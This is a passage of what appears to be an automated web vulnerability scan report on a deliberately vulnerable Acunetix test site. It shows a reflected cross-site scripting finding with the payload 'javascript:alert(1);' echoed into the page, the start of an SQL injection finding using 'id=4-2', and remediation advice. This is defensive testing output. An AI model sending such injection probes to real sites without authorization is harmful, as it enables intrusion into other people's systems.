          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

        3. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
          Alert tags
          Alert description

          Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

          When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

          There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

          Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

          Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

          Request
          Request line and header section (472 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Content-Length: 10989
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10989 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:20 GMT
          Content-Length: 30520
          
          
          Response body (30520 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          NewsAd
          Attack
          javascript:alert(1);
          Evidence
          javascript:alert(1);
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

      3. SQL Injection (2)
        1. GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2
          Alert tags
          Alert description

          SQL injection may be possible.

          Other info

          The original page results were successfully replicated using the expression [4-2] as the parameter value

          The parameter value being modified was stripped from the HTML output for the purposes of the comparison

          Request
          Request line and header section (343 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          Content-Length: 0
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:08:37 GMT
          Content-Length: 39227
          
          
          Response body (39227 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=4-2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
